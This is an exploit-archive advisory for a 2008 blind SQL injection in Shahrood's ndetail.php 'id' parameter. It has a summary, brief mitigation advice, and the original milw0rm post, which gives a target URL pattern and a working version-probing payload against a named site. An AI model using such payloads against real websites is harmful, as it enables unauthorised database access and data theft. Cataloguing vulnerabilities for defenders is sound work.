Shahrood (ndetail.php id) Blind SQL Injection Vulnerability

vendor:

ndetail.php

by:

BazOka-HaCkEr

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: ndetail.php

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Shahrood (ndetail.php id) Blind SQL Injection Vulnerability

A Blind SQL Injection vulnerability exists in Shahrood's ndetail.php script, which allows an attacker to inject arbitrary SQL queries. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This can be done by appending a malicious SQL query to the vulnerable parameter 'id' in the HTTP request. An attacker can use this vulnerability to gain access to sensitive information from the database, modify data, delete data, or even execute system level commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

========================================================

==> Shahrood (ndetail.php id) Blind SQL Injection Vulnerability

========================================================

==> AuThOr : BazOka-HaCkEr

==> EmaiL    : x9j@hotmail.com

==> HomE    :  www.TrYaG.cc/cc

========================================================

==> Product Page :

==> http://www.shahrood.net/

==> ExplO!te :

==> www.TarGeT.com/ndetail.php?id=[SQL]
 
==> Example :

==> www.shahvar.ir/ndetail.php?id=24+AND+SUBSTRING(@@version,1,1)=5

=========================================================

==> GreeTz :

==> FeezO , Abu-Mahdi , MoGaTiL , Mr.Al7rbi , Str0ke , TrYaG TeaM

=========================================================

# milw0rm.com [2008-11-01]